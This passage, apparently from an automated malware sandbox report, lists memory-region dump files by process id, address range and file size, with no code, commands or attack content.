                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3704-169-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-170-0x000000001B170000-0x000000001B172000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-199-0x0000000000C80000-0x0000000000C81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-141-0x0000000000390000-0x0000000000391000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-186-0x0000000000C60000-0x0000000000C7E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3788-153-0x0000000000C50000-0x0000000000C51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3936-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3936-359-0x0000000005270000-0x0000000005B96000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3936-392-0x0000000000400000-0x00000000030E7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            44.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/3956-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4112-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4164-430-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4212-499-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4296-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4368-229-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4368-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-314-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-289-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-319-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-250-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-257-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-261-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-276-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-248-0x0000000002320000-0x000000000235C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            240KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-254-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-321-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-320-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-311-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-313-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-317-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-309-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-308-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-299-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-271-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-302-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4460-296-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4604-304-0x0000000004E00000-0x00000000052FE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4604-262-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4604-260-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4644-275-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4644-280-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4644-306-0x00000000050A0000-0x00000000056A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4864-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/4996-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5196-504-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5248-498-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5356-503-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5376-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5476-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5528-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5540-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5556-533-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5836-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5856-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5876-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5920-483-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5932-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5944-524-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/5976-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/6024-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/6044-488-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/6076-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/6100-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • memory/6124-494-0x0000000000000000-mapping.dmp